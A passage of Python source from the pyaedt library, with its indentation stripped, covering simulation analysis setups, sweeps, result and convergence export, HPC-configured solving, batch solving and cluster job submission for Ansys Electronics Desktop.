Returns
-------
:class:`pyaedt.modeler.constants.AXIS`
Coordinate system axis constants tuple (.X, .Y, .Z).
"""
return CoordinateSystemAxis()
@property
def CoordinateSystemPlane(self):
"""Coordinate system plane constants.
.. deprecated:: 0.4.8
Use :attr:`PLANE` instead.
Returns
-------
:class:`pyaedt.modeler.constants.PLANE`
Coordinate system plane constants tuple (.XY, .YZ, .XZ).
"""
return CoordinateSystemPlane()
@property
def View(self):
"""Planes.
.. deprecated:: 0.4.8
Use :attr:`VIEW` instead.
Returns
-------
:class:`pyaedt.modeler.constants.PLANE`
Coordinate system plane string tuple ("XY", "YZ", "XZ").
"""
return Plane()
@property
def GravityDirection(self):
"""Gravity direction.
.. deprecated:: 0.4.8
Use :attr:`GRAVITY` instead.
Returns
-------
tuple
Gravity direction tuple (XNeg, YNeg, ZNeg, XPos, YPos, ZPos).
"""
return GravityDirection()
@property
def modeler(self):
"""Modeler.
Returns
-------
:class:`pyaedt.modeler.Modeler.Modeler`
Modeler object.
"""
return self._modeler
@property
def mesh(self):
"""Mesh.
Returns
-------
:class:`pyaedt.modules.Mesh.Mesh`
Mesh object.
"""
return self._mesh
@property
def post(self):
"""PostProcessor.
Returns
-------
:class:`pyaedt.modules.AdvancedPostProcessing.PostProcessor`
PostProcessor object.
"""
return self._post
@property
def analysis_setup(self):
"""Analysis setup.
Returns
-------
str
Name of the active or first analysis setup.
References
----------
>>> oModule.GetAllSolutionSetups()
"""
if self._setup:
return self._setup
elif self.existing_analysis_setups:
return self.existing_analysis_setups[0]
else:
self._setup = None
return self._setup
@analysis_setup.setter
def analysis_setup(self, setup_name):
setup_list = self.existing_analysis_setups
if setup_list:
assert setup_name in setup_list, "Invalid setup name {}".format(setup_name)
self._setup = setup_name
else:
self._setup = setup_list[0]
@property
def existing_analysis_sweeps(self):
"""Existing analysis sweeps.
Returns
-------
list of str
List of all analysis sweeps in the design.
References
----------
>>> oModule.GelAllSolutionNames
>>> oModule.GetSweeps
"""
setup_list = self.existing_analysis_setups
sweep_list = []
if self.solution_type == "HFSS3DLayout" or self.solution_type == "HFSS 3D Layout Design":
sweep_list = self.oanalysis.GetAllSolutionNames()
sweep_list = [i for i in sweep_list if "Adaptive Pass" not in i]
sweep_list.reverse()
else:
for el in setup_list:
sweeps = []
setuptype = self.design_solutions.default_adaptive
if setuptype:
sweep_list.append(el + " : " + setuptype)
else:
sweep_list.append(el)
if self.design_type in ["HFSS 3D Layout Design"]:
sweeps = self.oanalysis.GelAllSolutionNames()
elif self.solution_type not in ["Eigenmode"]:
try:
sweeps = list(self.oanalysis.GetSweeps(el))
except:
sweeps = []
for sw in sweeps:
if el + " : " + sw not in sweep_list:
sweep_list.append(el + " : " + sw)
return sweep_list
@property
def nominal_adaptive(self):
"""Nominal adaptive sweep.
Returns
-------
str
Name of the nominal adaptive sweep.
References
----------
>>> oModule.GelAllSolutionNames
>>> oModule.GetSweeps
"""
if len(self.existing_analysis_sweeps) > 0:
return self.existing_analysis_sweeps[0]
else:
return ""
@property
def nominal_sweep(self):
"""Nominal sweep.
Returns
-------
str
Name of the last adaptive sweep if a sweep is available or
the name of the nominal adaptive sweep if present.
References
----------
>>> oModule.GelAllSolutionNames
>>> oModule.GetSweeps
"""
if len(self.existing_analysis_sweeps) > 1:
return self.existing_analysis_sweeps[1]
else:
return self.nominal_adaptive
@property
def existing_analysis_setups(self):
"""Existing analysis setups.
Returns
-------
list of str
List of all analysis setups in the design.
References
----------
>>> oModule.GetSetups
"""
setups = list(self.oanalysis.GetSetups())
return setups
@property
def setup_names(self):
"""Setup names.
Returns
-------
list of str
List of names of all analysis setups in the design.
References
----------
>>> oModule.GetSetups
"""
return self.oanalysis.GetSetups()
@property
def SimulationSetupTypes(self):
"""Simulation setup types.
Returns
-------
SETUPS
List of all simulation setup types categorized by application.
"""
return SETUPS()
@property
def SolutionTypes(self):
"""Solution types.
Returns
-------
SOLUTIONS
List of all solution type categorized by application.
"""
return SOLUTIONS()
@property
def excitations(self):
"""Get all excitation names.
Returns
-------
list
List of excitation names. Excitations with multiple modes will return one
excitation for each mode.
References
----------
>>> oModule.GetExcitations
"""
try:
list_names = list(self.oboundary.GetExcitations())
del list_names[1::2]
return list_names
except:
return []
@pyaedt_function_handler()
def get_excitations_name(self):
"""Get all excitation names.
.. deprecated:: 0.4.27
Use :func:`excitations` property instead.
Returns
-------
list
List of excitation names. Excitations with multiple modes will return one
excitation for each mode.
References
----------
>>> oModule.GetExcitations
"""
warnings.warn("`get_excitations_name` is deprecated. Use `excitations` property instead.", DeprecationWarning)
return self.excitations
@pyaedt_function_handler()
def get_traces_for_plot(
self,
get_self_terms=True,
get_mutual_terms=True,
first_element_filter=None,
second_element_filter=None,
category="dB(S",
):
"""Retrieve a list of traces of specified designs ready to use in plot reports.
Parameters
----------
get_self_terms : bool, optional
Whether to return self terms. The default is ``True``.
get_mutual_terms : bool, optional
Whether to return mutual terms. The default is ``True``.
first_element_filter : str, optional
Filter to apply to the first element of the equation.
This parameter accepts ``*`` and ``?`` as special characters. The default is ``None``.
second_element_filter : str, optional
Filter to apply to the second element of the equation.
This parameter accepts ``*`` and ``?`` as special characters. The default is ``None``.
category : str
Plot category name as in the report (including operator).
The default is ``"dB(S"``, which is the plot category name for capacitance.
Returns
-------
list
List of traces of specified designs ready to use in plot reports.
Examples
--------
>>> from pyaedt import Q3d
>>> hfss = hfss(project_path)
>>> hfss.get_traces_for_plot(first_element_filter="Bo?1",
... second_element_filter="GND*", category="dB(S")
"""
if not first_element_filter:
first_element_filter = "*"
if not second_element_filter:
second_element_filter = "*"
list_output = []
end_str = ")" * (category.count("(") + 1)
if get_self_terms:
for el in self.excitations:
value = "{}({},{}{}".format(category, el, el, end_str)
if filter_tuple(value, first_element_filter, second_element_filter):
list_output.append(value)
if get_mutual_terms:
for el1 in self.excitations:
for el2 in self.excitations:
if el1 != el2:
value = "{}({},{}{}".format(category, el1, el2, end_str)
if filter_tuple(value, first_element_filter, second_element_filter):
list_output.append(value)
return list_output
@pyaedt_function_handler()
def analyze_all(self):
"""Analyze all setups in a design.
Returns
-------
bool
``True`` when simulation is finished.
"""
self.odesign.AnalyzeAll()
return True
@pyaedt_function_handler()
def list_of_variations(self, setup_name=None, sweep_name=None):
"""Retrieve a list of active variations for input setup.
Parameters
----------
setup_name : str, optional
Setup name. The default is ``None``, in which case the nominal adaptive
is used.
sweep_name : str, optional
Sweep name. The default is``None``, in which case the nominal adaptive
is used.
Returns
-------
list
List of active variations for input setup.
References
----------
>>> oModule.ListVariations
"""
if not setup_name and ":" in self.nominal_sweep:
setup_name = self.nominal_adaptive.split(":")[0].strip()
elif not setup_name:
self.logger.warning("No Setup defined.")
return False
if not sweep_name and ":" in self.nominal_sweep:
sweep_name = self.nominal_adaptive.split(":")[1].strip()
elif not sweep_name:
self.logger.warning("No Sweep defined.")
return False
if (
self.solution_type == "HFSS3DLayout"
or self.solution_type == "HFSS 3D Layout Design"
or self.design_type == "2D Extractor"
):
try:
return list(self.osolution.ListVariations("{0} : {1}".format(setup_name, sweep_name)))
except:
return [""]
else:
try:
return list(self.odesign.ListVariations("{0} : {1}".format(setup_name, sweep_name)))
except:
return [""]
@pyaedt_function_handler()
def export_results(self, analyze=False, export_folder=None):
"""Export all available reports to a file, including sNp, profile, and convergence.
Parameters
----------
analyze : bool
Whether to analyze before export. Solutions must be present for the design.
export_folder : str, optional
Full path to the project folder. The default is ``None``, in which case the
working directory is used.
Returns
-------
list
List of all exported files.
References
----------
>>> oModule.GetAllPortsList
>>> oDesign.ExportProfile
>>> oModule.ExportToFile
>>> oModule.ExportConvergence
>>> oModule.ExportNetworkData
"""
exported_files = []
if not export_folder:
export_folder = self.working_directory
if analyze:
self.analyze_all()
setups = self.oanalysis.GetSetups()
if self.solution_type == "HFSS3DLayout" or self.solution_type == "HFSS 3D Layout Design":
excitations = len(self.oexcitation.GetAllPortsList())
elif self.design_type == "2D Extractor":
excitations = self.oboundary.GetNumExcitations("SignalLine")
elif self.design_type == "Q3D Extractor":
excitations = self.oboundary.GetNumExcitations("Source")
else:
excitations = self.oboundary.GetNumExcitations()
reportnames = self.post.oreportsetup.GetAllReportNames()
for report_name in reportnames:
name_no_space = report_name.replace(" ", "_")
self.post.oreportsetup.UpdateReports([str(report_name)])
export_path = os.path.join(
export_folder, "{0}_{1}_{2}.csv".format(self.project_name, self.design_name, name_no_space)
)
try:
self.post.oreportsetup.ExportToFile(str(report_name), export_path)
self.logger.info("Export Data: {}".format(export_path))
except:
pass
exported_files.append(export_path)
for s in setups:
sweeps = self.oanalysis.GetSweeps(s)
if len(sweeps) == 0:
sweeps = ["LastAdaptive"]
else:
pass
for sweep in sweeps:
variation_array = self.list_of_variations(s, sweep)
if len(variation_array) == 1:
export_path = os.path.join(export_folder, "{}.prof".format(self.project_name))
result = self.export_profile(s, variation_array[0], export_path)
if result:
exported_files.append(export_path)
export_path = os.path.join(export_folder, "{}.conv".format(self.project_name))
result = self.export_convergence(s, variation_array[0], export_path)
if result:
exported_files.append(export_path)
if self.solution_type in ["HFSS3DLayout", "HFSS 3D Layout Design", "HFSS", "Circuit"]:
try:
export_path = os.path.join(
export_folder, "{0}.s{1}p".format(self.project_name, excitations)
)
self.osolution.ExportNetworkData(
variation_array[0],
["{0}:{1}".format(s, sweep)],
3,
export_path,
["All"],
True,
50,
"S",
-1,
0,
15,
True,
False,
False,
)
exported_files.append(export_path)
self.logger.info("Exported Touchstone: %s", export_path)
except:
self.logger.warning("Export SnP failed: no solutions found")
else:
varCount = 0
for variation in variation_array:
varCount += 1
export_path = os.path.join(export_folder, "{0}_{1}.prof".format(self.project_name, varCount))
result = self.export_profile(s, variation, export_path)
if result:
exported_files.append(export_path)
export_path = os.path.join(export_folder, "{0}_{1}.conv".format(self.project_name, varCount))
self.logger.info("Export Convergence: %s", export_path)
result = self.export_convergence(s, variation, export_path)
if result:
exported_files.append(export_path)
if self.solution_type in ["HFSS3DLayout", "HFSS 3D Layout Design", "HFSS", "Circuit"]:
try:
export_path = os.path.join(
export_folder, "{0}_{1}.s{2}p".format(self.project_name, varCount, excitations)
)
self.logger.info("Export SnP: {}".format(export_path))
self.osolution.ExportNetworkData(
variation,
["{0}:{1}".format(s, sweep)],
3,
export_path,
["All"],
True,
50,
"S",
-1,
0,
15,
True,
False,
False,
)
exported_files.append(export_path)
self.logger.info("Exported Touchstone: %s", export_path)
except:
self.logger.warning("Export SnP failed: no solutions found")
return exported_files
@pyaedt_function_handler()
def export_convergence(self, setup_name, variation_string="", file_path=None):
"""Export a solution convergence to a file.
Parameters
----------
setup_name : str
Setup name. For example, ``'Setup1'``.
variation_string : str
Variation string with values. For example, ``'radius=3mm'``.
file_path : str, optional
Full path to the PROF file. The default is ``None``, in which
case the working directory is used.
Returns
-------
str
File path if created.
References
----------
>>> oModule.ExportConvergence
"""
if " : " in setup_name:
setup_name = setup_name.split(" : ")[0]
if not file_path:
file_path = os.path.join(self.working_directory, generate_unique_name("Convergence") + ".prop")
if not variation_string:
val_str = []
for el, val in self.available_variations.nominal_w_values_dict.items():
val_str.append("{}={}".format(el, val))
variation_string = ",".join(val_str)
if self.design_type == "2D Extractor":
for setup in self.setups:
if setup.name == setup_name:
if "CGDataBlock" in setup.props:
file_path = os.path.splitext(file_path)[0] + "CG" + os.path.splitext(file_path)[1]
self.odesign.ExportConvergence(setup_name, variation_string, "CG", file_path, True)
self.logger.info("Export Convergence to %s", file_path)
if "RLDataBlock" in setup.props:
file_path = os.path.splitext(file_path)[0] + "RL" + os.path.splitext(file_path)[1]
self.odesign.ExportConvergence(setup_name, variation_string, "RL", file_path, True)
self.logger.info("Export Convergence to %s", file_path)
break
elif self.design_type == "Q3D Extractor":
for setup in self.setups:
if setup.name == setup_name:
if "Cap" in setup.props:
file_path = os.path.splitext(file_path)[0] + "CG" + os.path.splitext(file_path)[1]
self.odesign.ExportConvergence(setup_name, variation_string, "CG", file_path, True)
self.logger.info("Export Convergence to %s", file_path)
if "AC" in setup.props:
file_path = os.path.splitext(file_path)[0] + "ACRL" + os.path.splitext(file_path)[1]
self.odesign.ExportConvergence(setup_name, variation_string, "AC RL", file_path, True)
self.logger.info("Export Convergence to %s", file_path)
if "DC" in setup.props:
file_path = os.path.splitext(file_path)[0] + "DC" + os.path.splitext(file_path)[1]
self.odesign.ExportConvergence(setup_name, variation_string, "DC RL", file_path, True)
self.logger.info("Export Convergence to %s", file_path)
break
else:
self.odesign.ExportConvergence(setup_name, variation_string, file_path)
self.logger.info("Export Convergence to %s", file_path)
return file_path
@pyaedt_function_handler()
def _get_native_data(self):
"""Retrieve Native Components data."""
boundaries = []
try:
data_vals = self.design_properties["ModelSetup"]["GeometryCore"]["GeometryOperations"][
"SubModelDefinitions"
]["NativeComponentDefinition"]
if not isinstance(data_vals, list) and isinstance(data_vals, (OrderedDict, dict)):
boundaries.append(
NativeComponentObject(
self,
data_vals["NativeComponentDefinitionProvider"]["Type"],
data_vals["BasicComponentInfo"]["ComponentName"],
data_vals,
)
)
for ds in data_vals:
try:
if isinstance(ds, (OrderedDict, dict)):
boundaries.append(
NativeComponentObject(
self,
ds["NativeComponentDefinitionProvider"]["Type"],
ds["BasicComponentInfo"]["ComponentName"],
ds,
)
)
except:
pass
except:
pass
return boundaries
class AvailableVariations(object):
def __init__(self, app):
"""Contains available variations.
Parameters
----------
app :
Inherited parent object.
Returns
-------
object
Parent object.
"""
self._app = app
@property
def variables(self):
"""Variables.
Returns
-------
list of str
List of names of independent variables.
"""
return [i for i in self._app.variable_manager.independent_variables]
@pyaedt_function_handler()
def variations(self, setup_sweep=None):
"""Variations.
Parameters
----------
setup_sweep : str, optional
Setup name with the sweep to search for variations on. The default is ``None``.
Returns
-------
list of lists
List of variation families.
References
----------
>>> oModule.GetAvailableVariations
"""
vs = self.get_variation_strings(setup_sweep)
families = []
if vs:
for v in vs:
variations = v.split(" ")
family = []
for el in self.variables:
family.append(el + ":=")
i = 0
while i < len(variations):
if variations[i][0 : len(el)] == el:
family.append([variations[i][len(el) + 2 : -1]])
i += 1
families.append(family)
return families
@pyaedt_function_handler()
def get_variation_strings(self, setup_sweep=None):
"""Return variation strings.
Parameters
----------
setup_sweep : str, optional
Setup name with the sweep to search for variations on. The default is ``None``.
Returns
-------
list of str
List of variation families.
References
----------
>>> oModule.GetAvailableVariations
"""
if not setup_sweep:
setup_sweep = self._app.existing_analysis_sweeps[0]
return self._app.osolution.GetAvailableVariations(setup_sweep)
@property
def nominal(self):
"""Nominal."""
families = []
for el in self.variables:
families.append(el + ":=")
families.append(["Nominal"])
return families
@property
def nominal_w_values(self):
"""Nominal with values.
References
----------
>>> oDesign.GetChildObject('Variables').GetChildNames
>>> oDesign.GetVariables
>>> oDesign.GetVariableValue
>>> oDesign.GetNominalVariation"""
families = []
for k, v in list(self._app.variable_manager.independent_variables.items()):
families.append(k + ":=")
families.append([v.expression])
return families
@property
def nominal_w_values_dict(self):
"""Nominal with values in a dictionary.
References
----------
>>> oDesign.GetChildObject('Variables').GetChildNames
>>> oDesign.GetVariables
>>> oDesign.GetVariableValue
>>> oDesign.GetNominalVariation"""
families = {}
for k, v in list(self._app.variable_manager.independent_variables.items()):
families[k] = v.expression
return families
@property
def all(self):
"""List of all independent variables with `["All"]` value."""
families = []
for el in self.variables:
families.append(el + ":=")
families.append(["All"])
return families
class AxisDir(object):
"""Contains constants for the axis directions."""
(XNeg, YNeg, ZNeg, XPos, YPos, ZPos) = range(0, 6)
@pyaedt_function_handler()
def get_setups(self):
"""Retrieve setups.
Returns
-------
list of str
List of names of all setups.
References
----------
>>> oModule.GetSetups
"""
setups = self.oanalysis.GetSetups()
return list(setups)
@pyaedt_function_handler()
def get_nominal_variation(self):
"""Retrieve the nominal variation.
Returns
-------
list of str
List of nominal variations.
"""
return self.available_variations.nominal
@pyaedt_function_handler()
def get_sweeps(self, name):
"""Retrieve all sweeps for a setup.
Parameters
----------
name : str
Name of the setup.
Returns
-------
list of str
List of names of all sweeps for the setup.
References
----------
>>> oModule.GetSweeps
"""
sweeps = self.oanalysis.GetSweeps(name)
return list(sweeps)
@pyaedt_function_handler()
def export_parametric_results(self, sweepname, filename, exportunits=True):
"""Export a list of all parametric variations solved for a sweep to a CSV file.
Parameters
----------
sweepname : str
Name of the optimetrics sweep.
filename : str
Full path and name for the CSV file.
exportunits : bool, optional
Whether to export units with the value. The default is ``True``. When ``False``,
only the value is exported.
Returns
-------
bool
``True`` when successful, ``False`` when failed.
References
----------
>>> oModule.ExportParametricResults
"""
self.ooptimetrics.ExportParametricResults(sweepname, filename, exportunits)
return True
@pyaedt_function_handler()
def analyze_from_initial_mesh(self):
"""Revert the solution to the initial mesh and re-run the solve.
Returns
-------
bool
``True`` when successful, ``False`` when failed.
References
----------
>>> oModule.RevertSetupToInitial
>>> oDesign.Analyze
"""
self.oanalysis.RevertSetupToInitial(self._setup)
self.analyze_nominal()
return True
@pyaedt_function_handler()
def analyse_nominal(self):
"""Solve the nominal design.
.. deprecated:: 0.4.0
Use :func:`Analysis.analyze_nominal` instead.
"""
warnings.warn("`analyse_nominal` is deprecated. Use `analyze_nominal` instead.", DeprecationWarning)
self.analyze_nominal()
@pyaedt_function_handler()
def analyze_nominal(self, num_cores=None, num_tasks=None, num_gpu=None, acf_file=None, use_auto_settings=True):
"""Solve the nominal design.
Parameters
----------
num_cores : int, optional
Number of simulation cores.
num_tasks : int, optional
Number of simulation tasks.
num_gpu : int, optional
Number of simulation graphic processing units to use.
acf_file : str, optional
Full path to the custom ACF file.
use_auto_settings : bool, optional
Either if use or not auto settings in task/cores. It is not supported by all Setup.
Returns
-------
bool
``True`` when successful, ``False`` when failed.
References
----------
>>> oDesign.Analyze
"""
return self.analyze_setup(self.analysis_setup, num_cores, num_tasks, num_gpu, acf_file, use_auto_settings)
@pyaedt_function_handler()
def generate_unique_setup_name(self, setup_name=None):
"""Generate a new setup with an unique name.
Parameters
----------
setup_name : str, optional
Name of the setup. The default is ``None``.
Returns
-------
str
Name of the setup.
"""
if not setup_name:
setup_name = "Setup"
index = 2
while setup_name in self.existing_analysis_setups:
setup_name = setup_name + "_{}".format(index)
index += 1
return setup_name
@pyaedt_function_handler()
def create_setup(self, setupname="MySetupAuto", setuptype=None, props=None):
"""Create a setup.
Parameters
----------
setupname : str, optional
Name of the setup. The default is ``"MySetupAuto"``.
setuptype : optional
Type of the setup. The default is ``None``, in which case
the default type is applied.
props : dict, optional
Dictionary of analysis properties appropriate for the design and analysis.
If no values are passed, default values are used.
Returns
-------
:class:`pyaedt.modules.SolveSetup.Setup`
References
----------
>>> oModule.InsertSetup
Examples
--------
Create a setup for SBR+ setup using advanced Doppler
processing for automotive radar.
>>> import pyaedt
>>> hfss = pyaedt.Hfss(solution_type='SBR+')
>>> setup1 = hfss.create_setup(setupname='Setup1')
>>> setup1.props["IsSbrRangeDoppler"] = True
>>> setup1.props["SbrRangeDopplerTimeVariable"] = "time_var"
>>> setup1.props["SbrRangeDopplerCenterFreq"] = "76.5GHz"
>>> setup1.props["SbrRangeDopplerRangeResolution"] = "0.15meter"
>>> setup1.props["SbrRangeDopplerRangePeriod"] = "100meter"
>>> setup1.props["SbrRangeDopplerVelocityResolution"] = "0.2m_per_sec"
>>> setup1.props["SbrRangeDopplerVelocityMin"] = "-30m_per_sec"
>>> setup1.props["SbrRangeDopplerVelocityMax"] = "30m_per_sec"
>>> setup1.props["DopplerRayDensityPerWavelength"] = "0.2"
>>> setup1.props["MaxNumberOfBounces"] = "3"
>>> setup1.update()
...
pyaedt info: Sweep was created correctly.
"""
if props == None:
props = {}
if setuptype is None:
setuptype = self.design_solutions.default_setup
name = self.generate_unique_setup_name(setupname)
setup = Setup(self, setuptype, name)
if self.design_type == "HFSS" and not self.excitations and "MaxDeltaS" in setup.props:
new_dict = OrderedDict()
for k, v in setup.props.items():
if k == "MaxDeltaS":
new_dict["MaxDeltaE"] = 0.01
else:
new_dict[k] = v
setup.props = new_dict
setup.create()
if props:
for el in props:
setup.props[el] = props[el]
setup.update()
self.analysis_setup = name
self.setups.append(setup)
return setup
@pyaedt_function_handler()
def delete_setup(self, setupname):
"""Delete a setup.
Parameters
----------
setupname : str
Name of the setup.
Returns
-------
bool
``True`` when successful, ``False`` when failed.
References
----------
>>> oModule.DeleteSetups
Examples
--------
Create a setup and then delete it.
>>> import pyaedt
>>> hfss = pyaedt.Hfss()
>>> setup1 = hfss.create_setup(setupname='Setup1')
>>> hfss.delete_setup(setupname='Setup1')
...
pyaedt info: Sweep was deleted correctly.
"""
if setupname in self.existing_analysis_setups:
self.oanalysis.DeleteSetups([setupname])
for s in self.setups:
if s.name == setupname:
self.setups.remove(s)
return True
return False
@pyaedt_function_handler()
def edit_setup(self, setupname, properties_dict):
"""Modify a setup.
Parameters
----------
setupname : str
Name of the setup.
properties_dict : dict
Dictionary containing the property to update with the value.
Returns
-------
:class:`pyaedt.modules.SolveSetup.Setup`
References
----------
>>> oModule.EditSetup
"""
setuptype = self.design_solutions.default_setup
setup = Setup(self, setuptype, setupname, isnewsetup=False)
setup.update(properties_dict)
self.analysis_setup = setupname
return setup
@pyaedt_function_handler()
def get_setup(self, setupname):
"""Get the setup from the current design.
Parameters
----------
setupname : str
Name of the setup.
Returns
-------
:class:`pyaedt.modules.SolveSetup.Setup`
"""
setuptype = self.design_solutions.default_setup
setup = Setup(self, setuptype, setupname, isnewsetup=False)
if setup.props:
self.analysis_setup = setupname
return setup
@pyaedt_function_handler()
def create_output_variable(self, variable, expression, solution=None):
"""Create or modify an output variable.
Parameters
----------
variable : str
Name of the variable.
expression :
Value for the variable.
solution :
Name of the solution in the format `"setup_name : sweep_name"`.
If `None`, the first available solution is used. Default is `None`.
Returns
-------
bool
``True`` when successful, ``False`` when failed.
References
----------
>>> oModule.CreateOutputVariable
"""
oModule = self.ooutput_variable
if solution is None:
solution = self.existing_analysis_sweeps[0]
if variable in self.output_variables:
oModule.EditOutputVariable(variable, expression, variable, solution, self.solution_type, [])
else:
oModule.CreateOutputVariable(variable, expression, solution, self.solution_type, [])
return True
@pyaedt_function_handler()
def get_output_variable(self, variable, solution=None):
"""Retrieve the value of the output variable.
Parameters
----------
variable : str
Name of the variable.
solution :
Name of the solution in the format `"setup_name : sweep_name"`.
If `None`, the first available solution is used. Default is `None`.
Returns
-------
type
Value of the output variable.
References
----------
>>> oDesign.GetNominalVariation
>>> oModule.GetOutputVariableValue
"""
assert variable in self.output_variables, "Output variable {} does not exist.".format(variable)
nominal_variation = self.odesign.GetNominalVariation()
if solution is None:
solution = self.existing_analysis_sweeps[0]
value = self.ooutput_variable.GetOutputVariableValue(
variable, nominal_variation, solution, self.solution_type, []
)
return value
@pyaedt_function_handler()
def get_object_material_properties(self, object_list=None, prop_names=None):
"""Retrieve the material properties for a list of objects and return them in a dictionary.
This high-level function ignores objects with no defined material properties.
Parameters
----------
object_list : list, optional
List of objects to get material properties for. The default is ``None``,
in which case material properties are retrieved for all objects.
prop_names : str or list
Property or list of properties to export. The default is ``None``, in
which case all properties are exported.
Returns
-------
dict
Dictionary of objects with material properties.
"""
if object_list:
if not isinstance(object_list, list):
object_list = [object_list]
else:
object_list = self.modeler.object_names
if prop_names:
if not isinstance(prop_names, list):
prop_names = [prop_names]
dict = {}
for entry in object_list:
mat_name = self.modeler[entry].material_name
mat_props = self._materials[mat_name]
if prop_names is None:
dict[entry] = mat_props._props
else:
dict[entry] = {}
for prop_name in prop_names:
dict[entry][prop_name] = mat_props._props[prop_name]
return dict
@pyaedt_function_handler()
def analyze_setup(self, name, num_cores=None, num_tasks=None, num_gpu=None, acf_file=None, use_auto_settings=True):
"""Analyze a design setup.
Parameters
----------
name : str
Name of the setup, which can be an optimetric setup or a simple setup.
num_cores : int, optional
Number of simulation cores. The default is ``None.``
num_tasks : int, optional
Number of simulation tasks. The default is ``None.``
num_gpu : int, optional
Number of simulation graphics processing units. The default is ``None.``
acf_file : str, optional
Full path to custom ACF file. The default is ``None.``
use_auto_settings : bool, optional
Either if use or not auto settings in task/cores. It is not supported by all Setup.
Returns
-------
bool
``True`` when successful, ``False`` when failed.
References
----------
>>> oDesign.Analyze
"""
set_custom_dso = False
active_config = self._desktop.GetRegistryString(r"Desktop/ActiveDSOConfigurations/" + self.design_type)
if acf_file:
self._desktop.SetRegistryFromFile(acf_file)
name = ""
with open(acf_file, "r") as f:
lines = f.readlines()
for line in lines:
if "ConfigName" in line:
name = line.strip().split("=")[1]
break
if name:
try:
self.set_registry_key(r"Desktop/ActiveDSOConfigurations/" + self.design_type, name)
set_custom_dso = True
except:
pass
elif num_gpu or num_tasks or num_cores:
config_name = "pyaedt_config"
source_name = os.path.join(self.pyaedt_dir, "misc", "pyaedt_local_config.acf")
target_name = os.path.join(self.working_directory, config_name + ".acf")
shutil.copy2(source_name, target_name)
if num_cores:
update_hpc_option(target_name, "NumCores", num_cores, False)
if num_gpu:
update_hpc_option(target_name, "NumGPUs", num_gpu, False)
if num_tasks:
update_hpc_option(target_name, "NumEngines", num_tasks, False)
update_hpc_option(target_name, "ConfigName", config_name, True)
update_hpc_option(target_name, "DesignType", self.design_type, True)
if self.design_type == "Icepak":
use_auto_settings = False
update_hpc_option(target_name, "UseAutoSettings", self.design_type, use_auto_settings)
try:
self._desktop.SetRegistryFromFile(target_name)
self.set_registry_key(r"Desktop/ActiveDSOConfigurations/" + self.design_type, config_name)
set_custom_dso = True
except:
pass
if name in self.existing_analysis_setups:
try:
self.logger.info("Solving design setup %s", name)
self.odesign.Analyze(name)
except:
if set_custom_dso:
self.set_registry_key(r"Desktop/ActiveDSOConfigurations/" + self.design_type, active_config)
self.logger.error("Error in Solving Setup %s", name)
return False
else:
try:
self.logger.info("Solving Optimetrics")
self.ooptimetrics.SolveSetup(name)
except:
if set_custom_dso:
self.set_registry_key(r"Desktop/ActiveDSOConfigurations/" + self.design_type, active_config)
self.logger.error("Error in Solving or Missing Setup %s", name)
return False
if set_custom_dso:
self.set_registry_key(r"Desktop/ActiveDSOConfigurations/" + self.design_type, active_config)
self.logger.info("Design setup %s solved correctly", name)
return True
@pyaedt_function_handler()
def solve_in_batch(self, filename=None, machine="local", run_in_thread=False):
"""Analyze a design setup in batch mode.
.. note::
To use this function, the project must be closed.
Parameters
----------
filename : str, optional
Name of the setup. The default is ``None``, which means that the active project
is to be solved.
machine : str, optional
Name of the machine if remote. The default is ``"local"``.
run_in_thread : bool, optional
Whether to submit the batch command as a thread. The default is
``False``.
Returns
-------
bool
``True`` when successful, ``False`` when failed.
"""
if not filename:
filename = self.project_file
self.close_project()
if machine == "local":
# -Monitor option used as workaround for R2 BatchSolve not exiting properly at the end of the Batch job
options = " -ng -BatchSolve -Monitor "
else:
options = " -ng -distribute -machinelist list=" + machine + " -Batchsolve "
self.logger.info("Batch Solve Options: " + options)
if os.name == "posix":
batch_run = os.path.join(
self.desktop_install_dir + "/ansysedt" + chr(34) + options + chr(34) + filename + chr(34)
)
else:
batch_run = (
chr(34) + self.desktop_install_dir + "/ansysedt.exe" + chr(34) + options + chr(34) + filename + chr(34)
)
"""
check for existing solution directory and delete if present so we
dont have old .asol files etc
"""
self.logger.info("Solving model in batch mode on " + machine)
self.logger.info("Batch Job command:" + batch_run)
if run_in_thread:
def thread_run():
""" """
os.system(batch_run)
x = threading.Thread(target=thread_run)
x.start()
else:
os.system(batch_run)
self.logger.info("Batch job finished.")
return True
@pyaedt_function_handler()
def submit_job(
self, clustername, aedt_full_exe_path=None, numnodes=1, numcores=32, wait_for_license=True, setting_file=None
):
"""Submit a job to be solved on a cluster.
Parameters
----------
clustername : str
Name of the cluster to submit the job to.
aedt_full_exe_path : str, optional
Full path to the AEDT executable file. The default is ``None``, in which
case ``"/clustername/AnsysEM/AnsysEM2x.x/Win64/ansysedt.exe"`` is used.
numnodes : int, optional
Number of nodes. The default is ``1``.
numcores : int, optional
Number of cores. The default is ``32``.
wait_for_license : bool, optional
Whether to wait for the license to be validated. The default is ``True``.
setting_file : str, optional
Name of the file to use as a template. The default value is ``None``.
Returns
-------
type
ID of the job.
References
----------
>>> oDesktop.SubmitJob
"""
project_file = self.project_file
project_path = self.project_path
if not aedt_full_exe_path:
version = self.odesktop.GetVersion()[2:6]
if os.path.exists(r"\\" + clustername + r"\AnsysEM\AnsysEM{}\Win64\ansysedt.exe".format(version)):
aedt_full_exe_path = (
r"\\\\\\\\" + clustername + r"\\\\AnsysEM\\\\AnsysEM{}\\\\Win64\\\\ansysedt.exe".format(version)
)
elif os.path.exists(r"\\" + clustername + r"\AnsysEM\AnsysEM{}\Linux64\ansysedt".format(version)):
aedt_full_exe_path = (
r"\\\\\\\\" + clustername + r"\\\\AnsysEM\\\\AnsysEM{}\\\\Linux64\\\\ansysedt".format(version)
)
else:
self.logger.error("AEDT path does not exist. Please provide a full path.")
return False
else:
if not os.path.exists(aedt_full_exe_path):
self.logger.error("Aedt Path doesn't exists. Please provide a full path")
return False
aedt_full_exe_path.replace("\\", "\\\\")
self.close_project()
path_file = os.path.dirname(__file__)
destination_reg = os.path.join(project_path, "Job_settings.areg")
if not setting_file:
setting_file = os.path.join(path_file, "..", "misc", "Job_Settings.areg")
shutil.copy(setting_file, destination_reg)
f1 = open(destination_reg, "w")
with open(setting_file) as f:
lines = f.readlines()
for line in lines:
if "\\ $begin" == line[:8]:
lin = "\\ $begin \\'{}\\'\\\n".format(clustername)
f1.write(lin)
elif "\\ $end" == line[:6]:
lin = "\\ $end \\'{}\\'\\\n".format(clustername)
f1.write(lin)
elif "NumCores" in line:
lin = "\\ \\ \\ \\ NumCores={}\\\n".format(numcores)
f1.write(lin)
elif "NumNodes=1" in line:
lin = "\\ \\ \\ \\ NumNodes={}\\\n".format(numnodes)
